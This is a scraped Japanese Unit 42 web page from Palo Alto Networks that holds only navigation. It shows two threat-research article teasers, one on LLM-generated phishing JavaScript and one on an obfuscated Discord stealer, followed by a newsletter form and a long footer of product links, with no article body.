  ![Pictorial representation of runtime assembly attacks. Digital artwork of a glowing, futuristic shield disintegrating into small particles, set against a dark blue, bokeh-effect background.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/01/09_Business_email_compromise_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年1月22日 [#### ランタイムアセンブリ攻撃の新たなフロンティア：LLMを活用したフィッシング用JavaScriptのリアルタイム生成](https://unit42.paloaltonetworks.com/ja/real-time-malicious-javascript-through-llms/)

* [API](https://unit42.paloaltonetworks.com/ja/tag/api-ja/ "API")

* [Google](https://unit42.paloaltonetworks.com/ja/tag/google-ja/ "Google")

* [JavaScript](https://unit42.paloaltonetworks.com/ja/tag/javascript-ja/ "JavaScript")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/real-time-malicious-javascript-through-llms/ "ランタイムアセンブリ攻撃の新たなフロンティア：LLMを活用したフィッシング用JavaScriptのリアルタイム生成")  
  ![Pictorial representation of SLOW#TEMPEST campaign. Digital artwork depicting a malware alert symbol on a computer screen, with background of blurred programming code in blue and red colors.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/07_Malware_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年1月2日 [#### Pyarmorを利用して難読化と検知回避を行うVVS Discord Stealer](https://unit42.paloaltonetworks.com/ja/vvs-stealer/)

* [Discord](https://unit42.paloaltonetworks.com/ja/tag/discord/ "Discord")

* [Infostealer](https://unit42.paloaltonetworks.com/ja/tag/infostealer-ja/ "Infostealer")

* [Python](https://unit42.paloaltonetworks.com/ja/tag/python-ja/ "Python")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/vvs-stealer/ "Pyarmorを利用して難読化と検知回避を行うVVS Discord Stealer")

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)  
  ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg) ![Enlarged Image]()  
  ![Newsletter](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/04/Unit-42_get-updates-banner.png)  
  ![UNIT 42 Small Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/palo-alto-logo-small.svg) Unit 42 からの最新情報を取得

## 進化する脅威の状況を常に先取り

メール アドレス

本フォームを送信することにより、[利用規約](https://www.paloaltonetworks.jp/legal-notices/terms-of-use)に同意し、[プライバシー ポリシー](https://www.paloaltonetworks.jp/legal-notices/privacy)を承認したことになります。

本サイトは reCAPTCHA で保護されており、Googleの[プライバシー ポリシー](https://policies.google.com/privacy) と[サービス利用規約](https://policies.google.com/terms)が適用されます。

Invalid captcha!
サブスクライブ ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg) ![loader](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-loader.svg)  
{#footer} 製品とサービス

* [AI利用ネットワーク セキュリティ プラットフォーム](https://www.paloaltonetworks.jp/network-security)

* [AIのセキュア バイ デザイン](https://www.paloaltonetworks.jp/precision-ai-security/secure-ai-by-design)

* [Prisma AIRS](https://www.paloaltonetworks.jp/prisma/prisma-ai-runtime-security)

* [AI Access Security](https://www.paloaltonetworks.jp/sase/ai-access-security)

* [クラウド提供型セキュリティ サービス](https://www.paloaltonetworks.jp/network-security/security-subscriptions)

* [Advanced Threat Prevention](https://www.paloaltonetworks.jp/network-security/advanced-threat-prevention)

* [Advanced URL Filtering](https://www.paloaltonetworks.jp/network-security/advanced-url-filtering)

* [Advanced WildFire](https://www.paloaltonetworks.jp/network-security/advanced-wildfire)

* [Advanced DNS Security](https://www.paloaltonetworks.jp/network-security/advanced-dns-security)

* [Enterprise Data Loss Prevention](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Enterprise IoT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/enterprise-iot-security)

* [Medical IoT Security](https://www.paloaltonetworks.jp/network-security/medical-device-security)

* [Industrial OT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/industrial-ot-security)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [次世代ファイアウォール](https://www.paloaltonetworks.jp/network-security/next-generation-firewall)

* [ハードウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/hardware-firewall-innovations)

* [ソフトウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/software-firewalls)

* [Strata Cloud Manager](https://www.paloaltonetworks.jp/network-security/strata-cloud-manager)

* [SD-WAN for NGFW](https://www.paloaltonetworks.jp/network-security/sd-wan-subscription)

* [PAN-OS](https://www.paloaltonetworks.jp/network-security/pan-os)

* [Panorama](https://www.paloaltonetworks.jp/network-security/panorama)

* [セキュア アクセス サービス エッジ](https://www.paloaltonetworks.jp/sase)

* [Prisma SASE](https://www.paloaltonetworks.jp/sase)

* [App Acceleration](https://www.paloaltonetworks.jp/sase/app-acceleration)

* [自律型デジタルエクスペリエンス管理](https://www.paloaltonetworks.jp/sase/adem)

* [Enterprise DLP](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Prisma Access](https://www.paloaltonetworks.jp/sase/access)

* [Prisma Browser](https://www.paloaltonetworks.jp/sase/prisma-browser)

* [Prisma SD-WAN](https://www.paloaltonetworks.jp/sase/sd-wan)

* [リモート ブラウザ分離](https://www.paloaltonetworks.jp/sase/remote-browser-isolation)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [AI駆動型セキュリティ運用プラットフォーム](https://www.paloaltonetworks.jp/cortex)

* [Cloud Security](https://www.paloaltonetworks.jp/cortex/cloud)

* [Cortex Cloud](https://www.paloaltonetworks.jp/cortex/cloud)

* [Application Security](https://www.paloaltonetworks.jp/cortex/cloud/application-security)

* [Cloud Posture Security](https://www.paloaltonetworks.jp/cortex/cloud/cloud-posture-security)

* [Cloud Runtime Security](https://www.paloaltonetworks.jp/cortex/cloud/runtime-security)

* [Prisma Cloud](https://www.paloaltonetworks.jp/prisma/cloud)

* [AI駆動型SOC](https://www.paloaltonetworks.jp/cortex)

* [Cortex XSIAM](https://www.paloaltonetworks.jp/cortex/cortex-xsiam)

* [Cortex XDR](https://www.paloaltonetworks.jp/cortex/cortex-xdr)

* [Cortex XSOAR](https://www.paloaltonetworks.jp/cortex/cortex-xsoar)

* [Cortex Xpanse](https://www.paloaltonetworks.jp/cortex/cortex-xpanse)

* [Unit 42マネージド ディテクション\&レスポンス](https://www.paloaltonetworks.jp/cortex/managed-detection-and-response)

* [マネージドXSIAM](https://www.paloaltonetworks.jp/cortex/managed-xsiam)

* [次世代のアイデンティティ セキュリティ](https://www.paloaltonetworks.jp/idira)

* [特権アクセス管理](https://www.paloaltonetworks.jp/idira/human/privileged-access-management)

* [アイデンティティ管理とアクセス管理](https://www.paloaltonetworks.jp/idira/human/identity-and-access-management)

* [Endpoint Privilege Manager](https://www.paloaltonetworks.jp/idira/human/endpoint-privilege-manager)

* [アイデンティティ ガバナンス](https://www.paloaltonetworks.jp/idira/human/identity-governance)

* [従業員パスワード管理](https://www.paloaltonetworks.jp/idira/human/workforce-password-management)

* [エージェンティック アイデンティティ](https://www.paloaltonetworks.jp/idira/agentic)

* [シークレット管理](https://www.paloaltonetworks.jp/idira/machine/secrets-management)

* [統合型シークレット ガバナンス](https://www.paloaltonetworks.jp/idira/machine/unified-secrets-governance)

* [アプリケーションの認証情報配信](https://www.paloaltonetworks.jp/idira/machine/application-credentials-delivery)

* [ベンダーの特権アクセス](https://www.paloaltonetworks.jp/idira/human/vendor-privileged-access)

* [脅威インテリジェンス\&インシデント レスポンス サービス](https://www.paloaltonetworks.jp/unit42)

* [予防評価](https://www.paloaltonetworks.jp/unit42/assess)

* [インシデント レスポンス](https://www.paloaltonetworks.jp/unit42/respond)

* [セキュリティ戦略を変革](https://www.paloaltonetworks.jp/unit42/transform)

* [脅威インテリジェンスについて](https://www.paloaltonetworks.jp/unit42/threat-intelligence-partners)  
  会社名

* [パロアルトネットワークスについて](https://www.paloaltonetworks.jp/about-us)

* [採用情報](https://jobs.paloaltonetworks.com/en/)

* [お問合せ](https://www.paloaltonetworks.jp/company/contact-sales)

* [企業責任](https://www.paloaltonetworks.com/about-us/corporate-responsibility)

* [お客様向け](https://www.paloaltonetworks.jp/customers)

* [IR](https://investors.paloaltonetworks.com/)

* [拠点](https://www.paloaltonetworks.com/about-us/locations)

* [ニュースルーム](https://www.paloaltonetworks.jp/company/newsroom)  
  人気のあるリンク

* [ブログ](https://www.paloaltonetworks.com/blog/?lang=ja)

* [コミュニティ](https://www.paloaltonetworks.com/communities)

* [コンテンツライブラリ](https://www.paloaltonetworks.jp/resources)

* [Cyberpedia](https://www.paloaltonetworks.jp/cyberpedia)

* [イベントセンター](https://events.paloaltonetworks.com/)

* [電子メール設定の管理](https://start.paloaltonetworks.com/preference-center)

* [製品A〜Z](https://www.paloaltonetworks.jp/products/products-a-z)

* [製品認証](https://www.paloaltonetworks.com/legal-notices/trust-center/compliance)

* [脆弱性の報告](https://www.paloaltonetworks.com/security-disclosure)

* [サイトマップ](https://www.paloaltonetworks.jp/sitemap)

* [テクニカル ドキュメント](https://docs.paloaltonetworks.com/)

* [Unit 42](https://unit42.paloaltonetworks.jp/)

* [個人情報の販売および共有禁止](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd)
  ![Palo Alto Networks Logo](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/pan-logo-dark.svg)

* [プライバシー](https://www.paloaltonetworks.jp/legal-notices/privacy)

* [トラスト センター](https://www.paloaltonetworks.jp/legal-notices/trust-center)

* [利用規約](https://www.paloaltonetworks.jp/legal-notices/terms-of-use)

* [ドキュメント](https://www.paloaltonetworks.jp/legal-notices)

Copyright © 2026 Palo Alto Networks. All Rights Reserved

* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks)
* [![](https://www.paloaltonetworks.jp/content/dam/pan/en_US/images/icons/podcast.svg)](https://unit42.paloaltonetworks.com/unit-42-threat-vector-podcast/)
* JP  
  Select your language  
  ![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg) ![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg) ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg)

### Default Heading

Read the article ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg)  
Seekbar

![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg)  
![Volume](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-volume.svg)  
Volume
![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg)
